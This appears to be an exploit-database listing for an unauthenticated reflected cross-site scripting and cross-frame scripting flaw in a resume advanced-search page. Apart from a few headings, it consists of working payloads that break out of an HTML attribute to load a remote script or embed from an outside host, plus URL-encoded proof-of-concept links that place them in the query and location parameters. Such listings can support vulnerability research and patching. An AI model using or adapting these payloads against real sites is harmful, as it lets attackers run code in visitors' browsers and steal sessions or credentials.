Share
## https://sploitus.com/exploit?id=WPEX-ID:10481
Payloads:

"><script src="https://ex-mi.ru/payload/a2r.js"></script>

"><embed src="https://ex-mi.ru/payload/xfsii.html">

PoC Unauthenticated Reflected XSS:

https://example.com/resumes/advanced-search/?query=%22%3E%3Cscript+src%3D%22https%3A%2F%2Fex-mi.ru%2Fpayload%2Fa.js%22%3E%3C%2Fscript%3E&location=%22%3E%3Cscript+src%3D%22https%3A%2F%2Fex-mi.ru%2Fpayload%2Fa2r.js%22%3E%3C%2Fscript%3E&posted=1&results=1

PoC Unauthenticated XFS:

https://example.com/resumes/advanced-search/?query=%22%3E%3Cembed+src%3D%22https%3A%2F%2Fex-mi.ru%2Fpayload%2Fxfsii.html%22%3E&location=%22%3E%3Cembed+src%3D%22https%3A%2F%2Fex-mi.ru%2Fpayload%2Fxfsii.html%22%3E&posted=1&results=1